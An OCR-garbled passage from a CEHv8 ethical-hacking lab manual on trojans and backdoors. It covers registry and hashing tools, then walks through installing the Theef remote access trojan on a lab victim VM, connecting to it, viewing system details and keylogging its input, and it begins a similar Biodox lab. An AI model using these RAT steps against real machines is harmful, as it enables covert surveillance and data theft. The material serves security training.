^ HKLM\softw< 13% Ne or directory X :_ ] HKLM\sottw;^B□ HKLM\SOFT\/□ HKLM\SOFT\l

13%13%

FJe or directory X : File or directory X : Fie or directory X :

_ | HKLM\S0ttwi File or directory X :

□ 13 Registry junk 266 V


FIGURE 8.23: jvl6 Clean and fix my compute! Items.

24. The Registry junk section provides details for selected items.

־ ם !Clean and fix my computer ~[x64־W8] jv16 PowerTools 2012 י-1 *File Select Tools HelpItemSeverityDescriptionTags

Item / Severity Description Tags_] 3 Registry junk 266

3 ח Obsolete software entry 4

□ HKCUVSoftw 30% Obsolete software e□ HKCU^oftw 30% Obsolete software {□ HKUS\S-1-S- 30% Obsolete software ז□ HKUSV1-5- 30% Obsolete software e

□ (3 Oseless empty key 146

□ HKCRVaaot | 10% Useless empty key□ HKCRVaaot 20% Useless empty key□ HKCRVacrot 20% Useless empty keyח MKCRV.aaot 20% Useless emotv kev ✓י


FIGURE 8.25: jvl6 Clean and fix my computer Item registry junk.

25. Select all check boxes 111 die item list and click Delete. A dialog box appears. Click Yes.


H Compare the current Autoruns display with previous results that you've saved. Select File | Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items

J־־] If you are running Autoruns without administrative privileges on Windows Vista and attempt to change die state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights

— L&S fcslilfifl Page 479 Empty Locations selection in die Options menu is checked Autoruns doesn't show locations with no entries


jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[File Select Tools HelpItemSeventyDescriptionTags

TagsDescnptranSeventyItem

0 Jjv16 PowerTools 2012

OYou are about to delete a lot of erroneous registry data. Using the Fix option is always the better option. Are you sure you know what you are doing and want to proceed?

2 3 / 2 30 *I S la il menu and desktop items

Selectedj29^highlightedfttotah296

FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.

26. Go to the Home tab, and click die Control which programs start autom atically icon.



־

FIGURE 8.28: jvl6 Control which program start automatically.

27. Check programs in Startup manager, and then you can select die appropriate action.

T Z S


jv16 PowerTools 2012 [W8-x64] - Startup ManagerFile Select Tools Help

Enabled Process running YesSystem entry No PID 4280Program )usched.exe Threads 4Filename C: program Files (x86)VCommon 1 Base priority NormalCommand Ine 'C:\program FJes (x86)\Common Memory usage 9.12 MBLoaded from rt<EY_LOCAL ,MACHINE \SOFTVV< Page file usage 2.23 MBDescrption JavaCTM) Update SchecUer File size 246.92 KBTags

TagsDescrptionEnabled / Program

|l 1 Found software 10 —

■ Yes )usched.exe SIמ׳i C:program Files□ Yes googletalk.exe Google Talk C: program Files□ Yes EMP_UO.exe EPSON USB Dispk C:\Program Files =□ Yes Reader_sl.exe Adobe Acrobat S| C:\program Files□ Yes AdobeARM.exe Adobe Reader ar1C: program Files□ Yes 1gfxtray.exe igfxTray Module C:\Windowsteyst□ Yes hkcmd.exe hkcmd Module C:\Windows^yst□ Yes 1gfxpers.exe persistence Modi״ C:\Windowsfeyst

FIGURE 8.29: jvl6 Startup Manager Dialogue.

28. Click die Registry Tools menu to view registry icons.

jv16 PowerTools 2012File Language Tools Help

L

f!Live Support: Handbook not

Online avaiaWe

Trial Urn ta bon n Effect - 60 days leftIMACECRAFT> SOFTWARE

m 4 9 mR egs try Manager

RegistryF^der

Registry Find & Replace

RegistryCleaner

RegetryCompactor

RegistryInformation

RegistryMonitor

$

R egistry Tools

Trial ReminderYou are using the free trial version o f jv l6 PowerTools. Pick here to buy the real version'

System Tools

^ Privacy Tools

Backups

Acton H story

I U I Settings

100%Registry Health

FIGURE 8.30: jvl6 Registry tools.

29. Click File Tools to view hie icons.

UJ The Verify Signatures option appears in the Options menu on systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine if image signatures are valid

Cl The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected

B3 Use the Hide Microsoft Entries or Hide Windows Entries in the Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file dial's trusted by the system




FIGURE 8.31: jvl6 File tools.

30. Click System Tools ro view system icons.

xjv16 PowerTools 2012Fite Language Io o ls Help

LLive Support: Handbook not

Online avaiaWe

Q j

Trial Limtabon in E ffect - 60 days left

U EH

I MACECRAFT' SOFTWARE

Software Startup Start Menu AutomationUnrts taler Manager Tool Tool

Home

Registry Tools

!Im■! S y ste m Tools

Service SystemManager Optimizer

Trial ReminderYou are using the free trial version o f jv l6 PowerTools. Clio- to buy thereal version!

FIGURE 8.32: jv!6 System tools.

^ Privacy Tools

Backups

Action History

I Q I Settings

100%Registry Health


EE1 The Hide Windows Entries omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and the image resides beneath the %SvstemRoot% directory

& Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans

§a<&d9fl»־Page 482


31. Click Privacy tools to view privacy icon.

jv16 PowerTools 2012I E*e !,*"Quage 1001* Help

LLive Support: Handbook not

Online avarfable

Trial Lmtabon in Effect - 60 days left

history Disk WiperOeaner

1 MACECRAFT' S O F T W A R E

A Registry Too*s

1^ Fie Tools ך

B System Tools

Backups

Actjon Hstory

| L lj Settings

3 Trial ReminderYou are usng the free trial version of jv 16 PowerTools. C kk here to buy the real version י

FIGURE 8.33: jvl6 Privacy tools.

32. Click Backups in die menu to display die Backup Tool dialog box.T^TeT x Tjv16 PowerTools 2012

File Language loots Help

1L

Live Support: Handbook not

jv16 PowerTools 2012 [W8־x64] ־ Backup Tool I ~ I x

Trial Umitabon in Effect - 60 days leftO MACECRAFTS O F T W A R E

£He Select look Help

Registry Fie Backups Other Backups Backups

ID CreatedDescnptjon Type Size

Q 13 File Backups

□ Clean and Data removed 34 .6 KB 00062D 21 .09.2012,

Re Sejected ughliqhted otaM■

£Q You can com pare the current Autoruns display w ith previous results that you've saved. Se lectFile|Com pare and browse to the saved file. Autoruns w ill display in green any new item s, which correspond to entries that are not present in the saved file . Note that it does not show deleted item s

FIGURE 8.34: jvl6 Backup took




33. Go to Windows Server 20 12 Virtual Machine.

34. Double-click Fsum FrontEnd.exe, the executable tile located at D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.

35. The Fsum Frontend main window is shown 111 the following screenshotiz r^ Fsum Frontend vl .5.5.1׳ *

ESS

□ <rc16_125 d crc32jamcrc(7 edonkcyL f n 1 / ״0-64 י

C bdkr

H I crc16_ibm

IZ crc32_br1p2

d dhoZ35 CfnvO-22

ח ap hash

n crc16_ccitt

□ crcJZ

( j djb hash

Q. fletcher32

n Methods (96)

ח adlcrS Q adlcr15 Q adler32

ח ct£um_mp€c2 Q crc8 f l crc16־

□ crcl6_xr־<־dem □ crcl6_zmodem □ crcM

i c1c32_mpcg2 1 i crc.54 O crc64_ecma

n dF32 (_) flctchcr8 Q fletchcrl 6

Compare

Hath:

B - Q Fsum Frontend ₪ □ Tools

B - Q Calculate hashe: : =5E■ ■ : -23 Tod

&■■:3 Verify checksur Generate chec*

! 0 5 Options About ״״•

Encoding: Bate 16 (hexadecimal)lS a .U a

C?Log

2Web sits htipi.'/fsumfesourcefoi,״

FIGURE 8.35: FsumFrontEnd main window.

36. Select the type ot hash that you want; let’s say md5. Check die md5 check box.

Fsum Frontend v1.5.5.1

™ v! . . J.; . ___... x.t .........(_J haval224 (3) u b*val224 (4) u haval224 (5) Lhoval256(3) hava 1256(4) l_h»vjl256(5)

□ /wch Q jihJKh □ wnti? Cl «nd4 (✓m d*.|

Dpjwr32 n rip«mdl28 T 1 rlpemdlftO □ ripemd250 C ripemd320 C מ hash =0 sdbm f l shaO D >h«1 □ »ha2 (224) C sha2 (256) C 3h«2 (384)

1 1*12(512) n si:c64 f 1 sncfru2128(41 T 1 snefm’ 128 (81 r snefru2 256 W r snefru22S6f8> v

Mash:

Fie \ m

^ Co ^ 0 a | U k Q Encoding: | Base 16 (hexadecimal) v □ hw ac

_ Fsum Frontend ■j □ Tool*I H-I־ Calculate haiht

&>*■Tort

1 0 Verify checksur ! Generate chace

; 8 8 Options |־--י4 About

[<C

Webott http:.'/fsur>»«toj׳<«ror3*ne! I

= TAS K 5FsumFrontEnd

& CEH-Tools are also located mapped Network Drive (Z:) of Virtual Machines




FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a tile by clicking die File browse bottom from die desktop. That is Test.txt.

Fsum Frontcnd v1.5.5.1

| hava!2S6 (4) Q] hav3 2S0 (5)

B md5 O pMwr?

E" ripcmd320 I I1sha>>1

Q sha2 (256) □ sha2(3&4)

Chaval256(3)

G md4

E" 1ipcmd256

□ sha2 (224)

□ h aval224 (S)

□ md?

G ripemdl&O

Q s h a l

□ Methods (1/96)

□ havaL24 (J) □ hava!224 (4)

IH snefru2 128(4) I I snefru2 128 (8) I snefru2 256 14) I snefru2 256II

□ jshash

□ ripcmdl28

(~1 shaO

in tl7e6d

□ /hash

□ pj"32 risdbm n « k a 2 CS12I

Hash:

F ie |

Encoding: |Base 16 [hexadecimal) v j O HMAC=3 B ,

FsumFrontend Q Tools0-L 2 Co It j ate t«1Ik

I-c5 ne::•■S3 Verify chccksur

Generare chec* gH Optiors ■:J?| About

Website httpi.'/fiumfesourcerorge-ne:

Q Have Autoruns autom atically execute an Internet search in your browser by selecting Search Online in the Entry menu

FIGURE 8.37: FsumFrontEnd file browse.

& Autoruns displays the text "(Not verified)" next to the company name of an image that either does not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system

□ ac15_x25

|־־| bdkr

ח crc16Jbm

n ap hash

□ ac16_ccitt

□ »*er32□ crt16

□Methods :96)

0 adler? (~ladlerl6

D(bu1r.m pcg2 [H«c8

:1נ

|a !I Files r . T־

3

B--EZ Fsum Ficntcnd a - S Tools: b -ZH Calculate hashes

;-•G3 Fie :-2 3 Tec

jQ Verify checfcsi »( ___o. Generate chec

0©'•0»genire ’ Nev» folder

ComputerSycrem Folder

NetworkSystem Folder

M071lla FirefoxShortcut 1.06 KB

Google ChiomcShortcut Z31 KB

TestText Document 0 bytes

A -

S K

fe<r

■ Desktop J| Do*nlc«d«

Recent pieces

Ltoaries

3 Documents J1 Mudr

Pictures 8 Videos

flP ComputerLocal Disk (C:)

1—a Local Disk D) a Local Disk [&)

e: Test־le nan!־

ccfcrgc.׳*ctWebsite. http:Vfsumfc.50u׳

FIGURE 8.38: Fsum Front End file open.

38. Click Add Folder to select a folder to be added to die hash, for example, D:\CEH-Tools




G fl Autoiuns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for die file that's trusted by the system

FIGURE 8.39: FsumFrontEnd Add Folder.

£3 A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system

39. Respective tiles o f die selected folder w ill be listed 111 a list box.

Fsum Frontend v1.5.5.1

I_h«v«n2ac5) Ch«r11224{3J Cjsh*5h C ripemd160 Cshi2 224)

|_| Koval 128 (4)□ havall92[5) Qjhash□ ripemd128 [ ldaal

U havelVA (3)□ h«v«l192 (A)□ hav8l256 (5)□ pjw32□ shaO

CheckeAfsu mfronten d -1.5.5.1'ז eadme •jG־H

LlhailfiO□ hava!192(3)Dhaval256(4)□ panama [I!sdbm

LI 9*ז*י□ havall 60 (5)□ hwal256 G) 5jmd5□ rshash

| Methods <1/96!| ghj!h3 L 9-נרז׳_JhMl160(3) C_Kbv9II60(J}□ hav?C24 (4) Q (5)C mu

QiipemdSZQ

Browse For Folder

Qmd2 □ rip«fnd25€

H«s*File Dt\CB4-T00IACE

Fsum ficntend H-b2 Tools I B -t3 Cakuiatehashesj I i d«t

d i Tea ׳ j I: ft] Verify checksum hies

ate checksum fi6 £ •-־ene••:05 Options

► -i “•יי״“* t• A Administrator A Compute־׳t fa Local Disk (CO

«l Disk <D)

i L

I | CW«I 1iL ._______ ——

FIGURE 8.40: FsumFrontEnd Adding Folder.

Fsum fro n te n d v1.5.5.1 — I ם x

B 13 Fsum Frontend ׳-|i) □ Toolsi 1- 1■ I Cdk.jldte '1ail*

J־ “ ׳!•••^3 Tort

K Verify checksur ! |k G*n«r*!« <h«ci:

]••■88 Options About

ח M ethods(!/95:

(J h«val224 (J) [ J h«val224 (4) j j haval224 (5) U haval256 (3) L havat25&(4) Ch«val25$(5)

H jh*«h Q Jז hiKh CD >nd [Z rnri4 E ^*ייי d panama

npjv»32 nripem dl28 rlpemdloO P ripemd256 □ ripemd320 C ishash

□ »dbm □»haO □>hd1 □ »ha2 (224) Csha2(2S6) ( I (נ»»2 (384

1 ska2 (512) n»i2«64 1 1 *ncfru2123 Ml I snefm2 128 f81 V snefru2 256 M T snef1u2 254 f8> v Cow pare

Hash:

Fie l)ACEH-T0cls\CEHv3 Module 06 Trojans and BackdoorsNFiles and Folder Integrity ChedtciVsumfrontend1.5־| _ .

^ | _ 0 1 Encoding: |Basc 16 (hcxadcdmal) v | [J HMAC

File

<

1 t e L o J V =

Wtbflte http:,'/fscmfecoj'c«ror9*m : 1




I I Fsum Fron tend v l.5.5.1 ז - ! u H |14■ _2 Ftum fk 1>t«nd

a U Tooii: m t J CakulatehaihM

i: I«Bl

(9J V»1f, checksum 14c.: 6an<rat« th«cbum (4

cJJ Options About

□ Maihodb < 1 / 96(□ hav al* 60 01 ( >wvaM60(4) [ |haval160(3) t ►W192 (J) □ havall92<4) 1 |h*val192(5) ha. *1224(3)□ Kav »LL4 (4) r Saval2i4|S) ־־|haval2S60) □hw«l2*(4) □haval266<6) r)|h»h ~|»ha1bf~~l tm&? ( kmM v|«1d5 paiiama [” jpjw3J | |np*mdl2fl nirmdlM Qr^amd?* Lnpemdira Qnh»«h [julbm Q 1h»0 [_|י*ייי

141ft?(250 1 Om2(1«4> l«ha?(512) f wr(W ח mefru2128(41 I 11nefru2 128(81 »«rfru225«M1

■

Hath:.File Dt\CEH-Too(>'CEH. 3 Module 06 T1 cyans and BackdoorsSFiles and Folder Integrity ChecUf\(sumfrontend-1.S.S.lVitadme.ut

■_y j H :3 F f *■׳ 1 i L J Encoding: Ba.e 16 (hexadecimal) v] (~HMACFie^ D:\QH-Ioch\Thumb* db(810 \C£h-100(s\CEHk8 Lab Prere—0■ D־.'.CB+T0cls\CEH/8 Lab Prere-CH):\aH-T0cl5\CEH«e lab Prerc-

0 _oc(s\CEH/S lab Prere-£3 t>\CFH- T ocisxC EH/S lab Prere ז jij D:\CH4-Tocte\C £!-(•<€ Lab Prere_S£ O:\CEH-Tocb\CEH׳• Lab Prere—fejDACEH-TocttCB** Lab Prere-.J D '.CFH-TocbSCEH lab Pitrf—

<| 111 | > _j[>\C£H-TochvClHv6 lab Prere - ןLog ,J -

V.'r- hMpy/1»um«e toviHagp

FIGURE 8.41: FsumFrontEnd files list.

40. Click Generate checksum files. The progress bar shows the progress percentage complete for the hash hies generated.

Fsum Frortend v1.5.5.1

□ K* 41224 31*0י*«י nprmdlfcO

[!***2C224J

C]haval192 [5) I |npemd128U*•“1

□ hav *1192 (4)□ haval2S6 (S)□ pjw*2Q*h»0

5ncfru2128f41 I Isnefru2 128 (8) ?nrfru2 256fi

(5)192 Clwval(4) H haval2S6)

T״״״- pdbm!־*

»r lsoc6

□ hav all 60 (5)□ h״v.l2S6(3) 3 *ndSQrehsdi

ח *02 (512)

(׳ 1 96) Mrihodk ה]hawaT60G) [ h*׳all«0t4)

»״havtim (5)r ־־]l~ 1«pernd320 I *»2GS4)

Fsum frontend a L i Tools: H 1 Cakuiatehashes

I j 23־ Ted II (־ |K t224«4»I fep Verify checksum 14es - 11»U: £ Generate checksum fi _]np«m«£i6

14*2(256)

Hash |File D:\CEH-Tools'CEH.3f.lcdu e06Trcjans ard Backdcois'sRIes and Folder Integrity Checker\fsumfrontend-1.53.1\readme4tt

> 13 F| | [?■» y Encoding: Base 16 (hexadecimal) ~v] □HMACFie

[h\CB־MocHvThum*>vdb(SPD.CtM-Tooh\CtH Lab Prere- 0■ D־‘.CEHTocls\CEH/S Lab Prert_ O D:\CtH-TooH\CtHve Lab Prgrg-

I0D ־.OH-IocHXCEH* Lab Piwu.^ 0:\CfH.Too»5SCfHv« lab Prert_

D \CIH 1ee!*vC(M/fl lab Prcrc״ E0\ClH-Ioo<i\CIH4 Lab P׳v«_ #)DACB4 Toob\C&+״« Lab Prtrt- £ D \CfH Tooh\CFH*« lab Prcre_ |4JD\CtM- 10eh\C!Hw6 lab Pr»r»...

OptionsAbout

Q Autoruns w ill display a dialog w ith a button that enables you to re• launch Autoruns w ithadm inistrativerights

FIGURE 8.42: FsumFiontEnd Generate checksum files.




O You can also use the -e command-line option to launch initially launch Autoruns with administrative rights

41. The following is die list o f 111d5 tiles after completion.

& CEH-Tools are also located mapped Network Drive (Z:) of Virtual Machines

L a b A n a ly s is

Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and free information.

FIGURE 8.44: FsumFrontEnd list of hash files.

Fsum Frontend * 27% 1 ם 1 XJ

I r Ku׳n fantcnd a •1 . Took

W C«kul4l*hMh«11 N ■ ״; (9.J Vwif, Lhw.Uun.t4c, jj 6«nwj:«th*ckium 1i•-׳

I ;••cli Option*I 1••^Abool

<

־ iMalhodbtWKt ltwH6O0) I twval1«>(4) lhavaH60(5) [ h*׳aM92(J)

4)224)• ^ ר ) r *WV4224 IS) 1־ h«v#l2St><J> r |4)~}m d / r [ imiwmim□ S* [_1*pemdl« _J«h h״

shM? 064) l*w?(S1?) r Wfis

□ h«v«H92 (4)□ h.v.l2S6(S)

□ ihnOWffru212«(41

|h«val1M fS)n!h«h—|nprmdl28 |«h*1Iinf#ru2 1?8 (8)

h#v«!224 3)Jilh«h״

liprmdlM

W#ru22 K M

File CvLa .V . tv- j.- .Ctiklop'Tet.tilEncoding: Ba.e 16 <hewdicim.il) v □ hmac |

File ׳nd5D:\CEM-1 oc :1 v Thuubvdb B16B0289...

I D.CfcH-ToctsvCEH/* Lab PrtfS- C482F590״■ D:\CB+Toc!s\CB+<e Lab Prere- 4C029WF- SHttOH-T0c»5\CEH*labPrerc_ J40E83IC״

53 D'.CfcH-1 octs\C£H/S Lib Pref fc_ 0D7C8321- 3 DACEH-Toc*s\C&+/* Lab Prcre_ D22FF2CC...j i,D:\CB4-Tock\C£R.« Lab Prrrr_ 3B85A96A...

D:\CEH-Toc(s\C£Hv6 L«b Prere— C733050E7A7741C269A3S127BA6FMA7 | £)DA<B4-Too&CB*« Lab Prere- E8ECEDSA... I>\CFH-Toc CFH-eHbPrerc_ 08*2202-

j-, Log -

Re C:'U»*S\Admin««rjw<\0«ktop\Testt«tmdS: D41DeC DS»0CKGa13®09OGICFW2r£

1 Extcuton: (XkOCfcOOCOI

R c ft'CEH-Too•?‘Thunb . dbII <1

1p, ׳llurri'f lOU'tffcXgF

FIGURE 8.43: FsumFrontEnd progress of hash files.





Q u e s t io n s1. Scenario: Alice wants to use T C P View to keep an eye 011 external

connections. However, sometimes there are large numbers o f connections with a Remote Address o f "localhost:####". These entnes do not tell Alice anything o f interest, and the large quantity o f entnes caused useful entries to be pushed out o f view.

2. Is there any way to filter out the "localhost:####" Remote Address entries?

3. Evaluate what are the other details displayed by “ autoruns” and analyze the working o f autonins tool.

4. Evaluate the other options o f Jv l6 Power Tool and analyze the result.

5. Evaluate and list die algoriduns diat Fsum FrontEnd supports.


□ Yes 0 N o

Platfo rm Supported

0 C lassroom 0 iLabs




C r e a t i n g a S e r v e r U s i n g t h e T h e e f

T b e e f is a W in d m i s-b ased a p p lic a tio n fo r b o th th e c lie n t a n d se rve r end . T h e T h e e f

se rve r is a v iru s th a t yo n in s ta ll on y o u r v ic tim 's com p uter, a n d th e T h e e f c lie n t in

n h a ty o u th en u se to c o n tro l th e v im s.


A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-of- service (D D oS) attacks, 01־ it may be used to install additional Trojans 01־ other forms o f m alicious software. For example, a backdoor Trojan may be used to install a downloader 01־ dropper Trojan, which may 111 turn install a proxy Trojan used to relay spam 01־ a kevlogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the affected system and thus potentially lead to further compromise by other attackers.

You are a security adm inistrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, stealing valuable data from the network, and identity theft.


T lie objective o f tins lab is to help students learn to detect Trojan and backdoor attacks.


■ Creating a server and testing the network for attack

■ Detecting Trojans and backdoors

■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected


To carry tins out, you need:

■ Theef tool located at D:\CEH-T00ls\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\Theef

I CON KEY

/' V a lu a b le in fo rm a tio n

S T e s t y o u rk n o w l e d g e ____________

* W e b ex erc ise

£ Q ! W o rk b o o k re v ie w

JT Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors




■ A computer running Windows Server 2012 as host machine

■ A computer running Window Server 8 Virtual Machine (Attacker)

■ Windows Server 2008 running 111 Virtual Machine (Victim )

■ A web browser w ith In ternet access

■ Adm inistrative privileges to nm tools


Time: 20 Minutes


A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining die file allocation table on a hard drive.

Note: The versions o f die created client or host and appearance o f die website may differ from what it is 111 die lab, but die actual process o f creating the server and die client is same as shown 111 diis lab.

L a b T a s k s

1. Launch W indows Server 2008 Virtual Machine and navigate to Z:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.

2. Double-click Server210.exe to run die Trojan on the victim ’s machine.jija

* T׳ojans T /oes » denote Ac:e5s ־roiars (RAT) » Theef

M Sire HI-I Date mcKiiied 1-1 TypeL °ז*°

I 0 . COOararr.n

BO*ot?lO Edacrvcr210 e>e I pass e

j readn-e.txt

ciders v P|B9B9EBB1 !■3upx.exe

Cemnond Shell ~ rw * I ^JA Defacenent 'ro jars

^ Destruave T'oians | . Ebsnong Trojans

J i E-Mal T'ojans F P T ro ja r

£ GLlITro;ars

TP־rrTFH־1 S ־ r0)ars i t ICMP Bcddoor

^ MAC OS X Trojans

^ Proxy Ser\er Trojan:

Remote Access “rtgeApocalypse

^ Atelie׳ web Renr>1

k). DarkCorretRAT __^ ProRst

Theef

FIGURE 8.1: Windows Server 2008-Theef Folder

3. 111 the Open File - Security Warning window, click Run, as shown in diefollowing screenshot.

M T AS K 1

Create Server w ith Pro Rat




Open File - Security Warning

The publisher could not be verified Are you sure you want to run this software?

...emote Access Trojans (RAT)\Theef\Server210.exe Unknown Publisher

Application

Z:\CEHv8 Module 06Trojans and Backdoors\Trojan...

Name

Publisher

Type

From

I ]

CancelRun

This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run ל' t

FIGURE 8.2: Windows Server 2008-Secuiity Warning

4. Launch W indows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.

5. Double-click Client210.exe to access the victim machine remotely.|P . q T T ” 1

| Home Share View

Applicator took T h e e f

Manage v ©

»־־ ־8־ ״ Trcjans Types ► Remote Access Trojans (RAT) ► Theef v | (j | | Search Theef f i |

Favorites £ ccipara-n.ni

■ Desktop | Cl crt2'0.exe j£ Downloads iflj Ecitser\er21 C.exe

^ Recent places pcss.dll| readmetxt

39 Libraries Scanner.dll »׳"

[1 Documents ■ Sever210.ex6

J Music ׳' ■ J upx.exe

m Pictures <6 zip.dl

| j Videos

Homegroup

f f1 Computertim Local Disk (C:)V CEH Tools (\\10.0.0.

Network

9 items 1 item selected S22 KB

FIGURE 8.3: Windows 8-Running Client210.exe

6. 111 the Open File - Security Warning window, click Run, as shown 111 diefollowing screenshot.





Th e publisher could not be verified. Are you sure you want to run this software?

Name: ...pes\Remote Access Trojans (RAT)\Theef\Client210.exe Publisher Unknow n Publisher

Type Application

From: Z:\CEHv8Module06Trojansand BackdoorsNTrojans T...

S3

CancelRun

This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust.How can I decide what software to run?

FIGURE 8.4: Windows 8-Security Warning

7. The maui window o f Theef appears, as shown 111 die following screenshot.׳ n e e t v ^ iu 1^ 0 ־

Connect

2968FTP6703■>׳ Port

D isconnectConnect

A ☆Theef version 2.10 01/No׳.׳ember/2004

FIGURE 8.5: Theef Main Screen

8. Enter an IP address 111 the IP held, and leave die Port and FTP tields as dieir defaults.

9. 111 diis lab we are attacking Windows Server 2008 (10.0.0.13). Click Connect after entering die IP address o f W indows Server 2008.




T T 7T ieef v 2 10

Connect

2968FTP6703Port

D isconnectConnect

AComputer information

FIGURE 8.6: Theef Connecting to Victim Machine

10. Now ill Windows 8 you have access to view the Windows Server 2008 machine remotely.

r o -h e e fv .2 .1 0

Connect

10.0.0.13 - Port 6703 FTP 2968

DisconnectConnect

[15:05:31] Attempting connection w ith 10.0.0.13 [15:05:31] Connection established w ith 10.0.0.13 [15:05:31] Connection accepted [15:05:31] Connected to tra n s fe r port

% •Qj SY &AConnected to se rve r

FIGURE 8.7: Theef Gained access of Victim Machine

11. To view die computer information, click die Computer icon at die bottom o f die window.

12. 111 Computer Inform ation, you are able to view PC Details. OS Info, Home, and Network by clicking on die respective buttons.




Computer Information

Reply PCDetails received

FIGURE 8.8: Theef Compute! Information

13. Click die Spy icon to capture screens, keyloggers, etc. o f the victim ’s machine.

p r TTieef v.2.10

Computer Information

U ser name: Adm in istra tor

Computer name: WIN-EGBHISG14L0

Registered organisation: M icrosoft Registered ow ner: M icrosoft W orkgroup: [U nknown]

Available memory: 565 Mb o f 1022 MbProcessor: Genuinelntel In te64 Family 6 Model 42 Stepping 7 (3095 M hz)

D isplay res: 800 x 600 Printer: [U nknown]

Hard drives:C:\ (6,186 Mb o f 16,381 Mb free)

PC Details <#] OS Info ^ 5 Home N etwork

FIGURE 8.9: Theef Spy

14. Select Keylogger to record the keystrokes o l die victim .

15. 111 the Keylogger window, click die Play button to record the keystrokes.




Keylogger [Started]

jcv*־FIGURE 8.9: Theef Keyloggei Window

16. Now go to Windows Server 2008 and type some text 111 Notepad to record die keystrokes.

Keylogger [Started]

[New Text Document.txt - Notepad] HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the world famouse {BACKSPACE} hacker.j[CTRL}{CTRL}{ALT}

< ? ©*51tvFIGURE 8.10: Theef recorded Key Strokes

17. Sim ilarly, you can access die details o f die victim ’s machine by clicking die respective icons.

L a b A n a ly s is

Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posuire and exposure dirough public and free information.






T h ee fO utput:Victim s machine PC Inform ation V ictim s machine keystorkes

Q u e s t io n s1. Is there any way to iilter out the "localhost:# # # # " remote address entries?

2. Evaluate the other details displayed by “ autoruns” and analyze the working o f the autonins tool.

0 N o


□ Yes

Platfo rm Supported

0 !Labs0 C lassroom




C r e a t i n g a S e r v e r U s i n g t h e B i o d o x

T h e e f is a W in d o w s bnsed a p p lic a tio n fo r bo th th e c lie n t a n d se rv e r end. T h e T h e e f

se rve r is a v im s th a t yo n in s ta ll on y o u r v ic tim s com p uter, a n d th e T h e e f c lie n t in

n h a t yo n th en u se to c o n tro l th e v iru s .


You are a security adm inistrator o f your company, and your job responsibilities include protecting die network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.




י Creating a server and testing the network tor attack

י Detecting Trojans and backdoors



To earn״ tins out, you need:

■ Biodox tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan

■ A computer running Windows Server 2012 as Host Machine

A י computer running Window Server 8 V irtual Machine (Attacker)

י W indows Server 2008 running 111 Virtual Machine (Victim )

A י web browser w ith In ternet access

י Adm inistrative privileges to mn tools

I CON KEY

/' V a lu a b lein fo rm a tio n

T e s t y o u rk n o w led g e

— W e b ex erc ise

ca W o rk b o o k re v ie w

& Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors





Tune: 20 Minutes


A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die file allocation table on a hard dnve.

Note: The versions o f die created client or host and appearance o f die website may d iller from what it is 111 die lab, but die actual process o f creating die server and die client is same as shown 111 diis lab.

L a b T a s k s

1. Launch W indows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

Double-click BIODOX OE Edition .exe to m il die Trojan on die victim ’s machine.

2.

r w ־ ' Applicator took B io d o x

I 1 Home Shaic Vievr Manage v ©0 -*) t ,־,ז » , nsTypcs ► GUITrojans ► Bo cox Tiojen ► Biodox v| C, | | Search Biodox *.

Favorites Jl. Language

W Desktop Pbgns

£ Downloads ; 3 BI3COX CE Edrtion.e<e]

Recent places ' Lee me

& MSCOMCTL.OCX

3 9 Libraries j * MSW1NSOCOCX

H) Document? A res.qf

Music g sewings.ini

B Pictures

|§ j Videos

FIGURE 9.1: Windows 8-Biodox Contents

111 the Open File - Security Warning window, click Run, as shown in following screenshot.

3.

Open File ־ Security Warning

Th e publisher could not be verified. Are you sure you want to run this software?

Name: ...I Trojans\BiodoxTrojan\Biodox\BIODOX OE Edition.exe Publisher Unknow n Publisher

Type: ApplicationFrom: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans T...

CancelRun


m T AS K 1

Create Server w ith ProRat





4. Select yourpreferred language from die drop-down list 111 die Biodox main window: 111 diis lab we have selected English.

Biodox Open Source Edition

ua>
